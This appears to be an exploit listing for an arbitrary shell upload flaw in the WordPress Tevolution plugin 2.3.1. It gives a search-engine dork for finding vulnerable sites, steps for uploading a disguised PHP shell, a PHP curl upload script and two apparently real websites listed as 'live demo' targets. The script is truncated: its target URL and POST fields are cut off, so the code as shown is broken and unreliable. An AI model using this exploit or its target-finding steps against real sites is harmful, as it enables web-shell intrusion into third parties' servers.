WordPress Tevolution plugin version 2.3.1 suffers from a remote shell upload vulnerability.
# Exploit Title : Wordpress Tevolution Plugin 2.3.1 Arbitrary Shell Upload Vulnerability
# Exploit Author : xBADGIRL21
# Dork : inurl:/wp-content/plugins/Tevolution/tmplconnector
# Vendor Homepage : https://templatic.com/
# version : 2.3.1
# Tested on: [ BackBox ]
# skype:xbadgirl21
# Date: 15/08/2016
# video Proof : https://youtu.be/eVjW6rnaoSY
# [+] The Tevolution WordPress plugin enables advanced functionality in our themes.
# [+] Some of the features it enables include custom post types, monetization options, custom fieldsa|
# [+] An arbitrary shell upload web vulnerability has been detected in the Tevolution Plugin 2.3.1 and below.
# [+] The vulnerability allows remote attackers to upload arbitrary files within the wordpress upload directory
# [+] USAGE :
# 1.- Download or Copy the Exploit C0des
# 2.- Use Dork and Choose One Of the Website
# 3.- Edit The Script
# 4.- Upload Your File : shell.php.jpg or shell.php.txt
# [+] Exploit:
$uploadfile="x21.PhP.Txt"; ///xBADGIRL21 ! Removing my name Doesn't mean
you are the Founder or Owner of this ^_^
$ch = curl_init("
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
print "$postResult";
# [+] Dev!l Path :
# [+] Live Demo :
# http://guiagronicaragua.com
# http://eventsinsuriname.com
# Discovered by : xBADGIRL21 - Unkn0wN
# Greetz : All Mauritanien Hackers - NoWhere
### Note ### : This Exploit Been Discovered By Someone iKnow but he Don't
Want me to Write His Name
# so I Just Write the Exploit C0des ...........